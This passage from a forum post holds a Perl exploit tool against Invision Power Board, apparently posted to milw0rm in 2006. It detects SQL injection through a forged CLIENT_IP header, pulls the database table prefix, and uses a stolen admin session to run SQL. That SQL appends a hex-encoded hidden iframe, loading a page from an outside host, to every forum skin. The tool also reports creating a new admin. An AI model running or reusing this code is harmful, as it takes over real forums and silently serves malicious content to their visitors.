$if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';

$query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";

$res = $xpl->post($url2."?adsess=$session_id",

[

'code' => 'runsql',

'act' => 'sql',

'section' => 'admin',

'query' => $query,

],

'USER_AGENT'=>'',

'CLIENT_IP'=>"$session_ip_address",

'X_FORWARDED_FOR'=>"$session_ip_address");

$InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;

$InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}

sub test_vuln()

{

$InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK wrote: );

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$xpl = LWP::UserAgent->new( ) or die;

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /ipb_var_s(s*)=(s*)"(.*)"/) { $rep = $3; }

if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }

else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}

sub get_prefix()

{

$InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK wrote: );

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;

$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

$xpl = LWP::UserAgent->new( ) or die;

$res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /FROM (.*)sessions/)

{

$prefix = $1;

$InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;

}

else

{

$InfoWindow->add('Label', -text => 'Can't get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }

}

else

{

$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;

$InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;

}

$InfoWindow->Show();

$InfoWindow->destroy;

}

sub session()

{

return 'r57ipb216_for_IDS';

}

# milw0rm.com [2006-07-14][/list:u]

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...